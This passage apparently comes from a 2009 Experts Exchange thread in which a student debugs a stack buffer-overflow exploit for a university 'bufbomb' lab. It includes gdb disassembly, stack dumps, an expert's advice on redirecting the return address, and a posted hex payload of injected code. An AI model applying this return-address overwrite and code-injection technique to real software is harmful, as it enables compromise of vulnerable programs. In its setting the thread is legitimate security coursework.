0x08048e1e <Gets+78>:   mov    (%eax),%eax
0x08048e20 <Gets+80>:   testb  $0x10,0x1(%eax,%ebx,2)
0x08048e25 <Gets+85>:   je     0x8048e00 <Gets+48>
0x08048e27 <Gets+87>:   lea    0xffffffd0(%ebx),%eax
0x08048e2a <Gets+90>:   cmp    $0x9,%eax
0x08048e2d <Gets+93>:   mov    %eax,%edx
0x08048e2f <Gets+95>:   jbe    0x8048e40 <Gets+112>
0x08048e31 <Gets+97>:   lea    0xffffffbf(%ebx),%eax
0x08048e34 <Gets+100>:  cmp    $0x5,%eax
0x08048e37 <Gets+103>:  lea    0xffffffc9(%ebx),%edx
0x08048e3a <Gets+106>:  jbe    0x8048e40 <Gets+112>
0x08048e3c <Gets+108>:  lea    0xffffffa9(%ebx),%edx
0x08048e3f <Gets+111>:  nop    
0x08048e40 <Gets+112>:  test   %edi,%edi
0x08048e42 <Gets+114>:  je     0x8048e90 <Gets+192>
0x08048e44 <Gets+116>:  xor    %edi,%edi
0x08048e46 <Gets+118>:  mov    %edx,0xfffffff0(%ebp)
0x08048e49 <Gets+121>:  jmp    0x8048e00 <Gets+48>
0x08048e4b <Gets+123>:  nop    
0x08048e4c <Gets+124>:  lea    0x0(%esi),%esi
0x08048e50 <Gets+128>:  cmp    $0xa,%eax
0x08048e53 <Gets+131>:  je     0x8048e74 <Gets+164>
0x08048e55 <Gets+133>:  mov    %al,(%esi)
0x08048e57 <Gets+135>:  movsbl %al,%eax
0x08048e5a <Gets+138>:  add    $0x1,%esi
0x08048e5d <Gets+141>:  call   0x80488d0 <save_char>
0x08048e62 <Gets+146>:  mov    0x804a1a0,%eax
0x08048e67 <Gets+151>:  mov    %eax,(%esp)
0x08048e6a <Gets+154>:  call   0x80486b4 <_IO_getc@plt>
0x08048e6f <Gets+159>:  cmp    $0xffffffff,%eax
0x08048e72 <Gets+162>:  jne    0x8048e50 <Gets+128>
0x08048e74 <Gets+164>:  movb   $0x0,(%esi)
0x08048e77 <Gets+167>:  mov    0x804a1c4,%eax
0x08048e7c <Gets+172>:  movb   $0x0,0x804a1e0(%eax,%eax,2)
0x08048e84 <Gets+180>:  mov    0x8(%ebp),%eax
0x08048e87 <Gets+183>:  add    $0xc,%esp
0x08048e8a <Gets+186>:  pop    %ebx
0x08048e8b <Gets+187>:  pop    %esi
0x08048e8c <Gets+188>:  pop    %edi
0x08048e8d <Gets+189>:  pop    %ebp
0x08048e8e <Gets+190>:  ret    
0x08048e8f <Gets+191>:  nop    
---Type <return> to continue, or q <return> to quit---
0x08048e90 <Gets+192>:  mov    0xfffffff0(%ebp),%eax
0x08048e93 <Gets+195>:  mov    $0x1,%edi
0x08048e98 <Gets+200>:  shl    $0x4,%eax
0x08048e9b <Gets+203>:  lea    (%edx,%eax,1),%eax
0x08048e9e <Gets+206>:  mov    %al,(%esi)
0x08048ea0 <Gets+208>:  movsbl %al,%eax
0x08048ea3 <Gets+211>:  add    $0x1,%esi
0x08048ea6 <Gets+214>:  call   0x80488d0 <save_char>
0x08048eab <Gets+219>:  jmp    0x8048e00 <Gets+48>
End of assembler dump. 
Dump of assembler code for function getbuf:
0x08048f40 <getbuf+0>:  push   %ebp
0x08048f41 <getbuf+1>:  mov    %esp,%ebp
0x08048f43 <getbuf+3>:  sub    $0x18,%esp
0x08048f46 <getbuf+6>:  lea    0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>:  mov    %eax,(%esp)
0x08048f4c <getbuf+12>: call   0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov    $0x1,%eax
0x08048f56 <getbuf+22>: leave  
0x08048f57 <getbuf+23>: ret    
0x08048f58 <getbuf+24>: nop    
0x08048f59 <getbuf+25>: lea    0x0(%esi),%esi
End of assembler dump.
                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:
73:
74:
75:
76:
77:
78:
79:
80:
81:
82:
83:
84:
85:
86:
87:
88:
89:
90:
91:

Select allOpen in new window

 

by: purewinPosted on 2009-11-05 at 20:55:53ID: 25756697

So can you confirm that it is indeed my code not falling together correctly?

(gdb) break *0x08048f4c
Breakpoint 1 at 0x8048f4c
(gdb) break *0x08048f57
Breakpoint 2 at 0x8048f57
(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f4c in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd0 in Gets ()
(gdb) si
0x08048dd1 in Gets ()
(gdb) x/32xw $sp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/32xw $sp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f57 in getbuf ()
(gdb) x/32xw $sp
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de0804      0xd0685d5f
0xbfffb41c:     0xc308048c      0xbfffb3fc      0xdeadbe00      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0xbfffb40c in ?? ()
(gdb) x/x 0xbfffb408
0xbfffb408:     0xbfffb428
(gdb) x/32xw 0xbfffb408
0xbfffb408:     0xbfffb428      0xbfffb40c      0xa1c005c7      0x53de0804
0xbfffb418:     0xd0685d5f      0xc308048c      0xbfffb3fc      0xdeadbe00
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb468:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb478:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32xw 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de0804      0xd0685d5f
0xbfffb41c:     0xc308048c      0xbfffb3fc      0xdeadbe00      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) 
                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:
73:
74:
75:
76:
77:
78:
79:
80:
81:
82:

Select allOpen in new window

 

by: Infinity08Posted on 2009-11-06 at 08:06:46ID: 25760321

>> (gdb) si
>> 0xbfffb40c in ?? ()

The overwritten return address needs to point to the start of your exploit code, not to itself.

 

by: purewinPosted on 2009-11-06 at 12:43:20ID: 25762864

So it needs to point to this address then?
0xbfffb3fc

 

by: purewinPosted on 2009-11-06 at 15:31:14ID: 25764007

0xbfffb3fc looks to be the right address...But it doesn't work. Or do I need to find the value at that address and use that?

Breakpoint 2, 0x08048dd0 in Gets ()
(gdb) si
0x08048dd1 in Gets ()
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/x ($ebp+8)
0xbfffb3f0:     0xbfffb3fc
(gdb) x/x $ebp
0xbfffb3e8:     0xbfffb408
(gdb) x/32w ($ebp+8)
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32w ebp
No symbol table is loaded.  Use the "file" command.
(gdb) x/32w $ebp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: purewinPosted on 2009-11-07 at 13:11:28ID: 25768066

I just can't figure out what I'm doing wrong...this is so aggravating.

 

by: purewinPosted on 2009-11-07 at 13:44:28ID: 25768194

The address I need to get my code called is stored at ebp+8 correct?

 

by: purewinPosted on 2009-11-07 at 14:13:19ID: 25768293

Do i need to set my exploit code up like this?
(padding)(return to bang)(set global variable)(return to my code)

return to bang would overwrite the ret address in getbuf and then return address for my code would be found in ebp+8 is Gets?

 

by: purewinPosted on 2009-11-07 at 20:58:04ID: 25769447

Okay well I'm close now I'm getting a missfire I know that 0x08048a1c0 is the right address I need to store my cookie in so I'm not sure why this won't work.

fc b3 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf d0 8c 04 08 c7 05 c0 a1 04 08 de 53 5f 5d 68 d0 8c 04 08 c3

 

by: purewinPosted on 2009-11-08 at 01:40:37ID: 25769947

Okay well I did the above string wrong and its not going to work so scratch that I figured it out. Thanks alot for the help you gave...you really are good with this stuff and I really appreciate the help. Are there any online resources you could recommend for assembly and these sorts of concepts? Also I'm sure I'll be posting some questions on the last phase if you would like to offer insight. Again thanks for the help!

 

by: Infinity08Posted on 2009-11-08 at 02:49:05ID: 25770089

No problem. I'm not always available all the time, but when I am, I'm glad to be of assistance :)

Online resources for assembly ? Experience mainly comes with practice (after doing all these phases for example, I'm sure you have a much better understanding of how the stack works heh). But you could have a look at "The Art of Assembly Language Programming" :

        http://homepage.mac.com/randyhyde/webster.cs.ucr.edu/www.artofasm.com/index.html

which gives a good introduction into practical assembly programming.

 

by: purewinPosted on 2009-11-08 at 02:57:12ID: 25770101

I completed the last phase! Man I love this stuff! Sucks though that I never learn anything from class...always end up teaching myself. lol. I may attempt the extra phase sometime later today but I have more work to do before that again Infinity thanks for all your help!

 

by: Infinity08Posted on 2009-11-08 at 03:09:10ID: 25770120

>> always end up teaching myself. lol.

That's not necessarily bad. What you learn for yourself is not easily forgotten :)

 

by: purewinPosted on 2009-11-08 at 03:44:09ID: 25770177

True. Just sucks I pay all this money and end up learning on my own. :(

20120131-EE-VQP-002

3 Ways to Join

30-Day Free Trial

The Experts

98% positive feedback on 31,087 answers since March 2000. angeliii is a Microsoft Most Valuable Professional for his work with MS SQL Server & Develoment.

He has also proven his knowledge of Visual Basic Programming, PHP Scripting and Oracle Databases.

The Experts

97% positive feedback on 10,752 answers since July 2000. lrmoore has more than 18 years experience in the networking industry.

The six-time Mircosoft MVPs specialties include firewalls, virtual private networking, and network management.

Testimonials

"...and excellent source for support... Kind of like having your very own IT dept." Electriciansnet

Testimonials

"I was apprehensive at signing up at first. However... it has already made my life as an IT administrator much easier." JaCrews

Testimonials

"WOW! You guys have great, active, and knowledgeable people on here." moore50

Business Clients

Business Clients

In the Press

"If you’ve got a question... Experts Exchange can supply an answer.”

In the Press

"...an invaluable aid for both IT professionals and those who require tech support."

In the Press

"where IT professionals provide quick answers on just about any topic"

Business Account Plans

Loading Advertisement...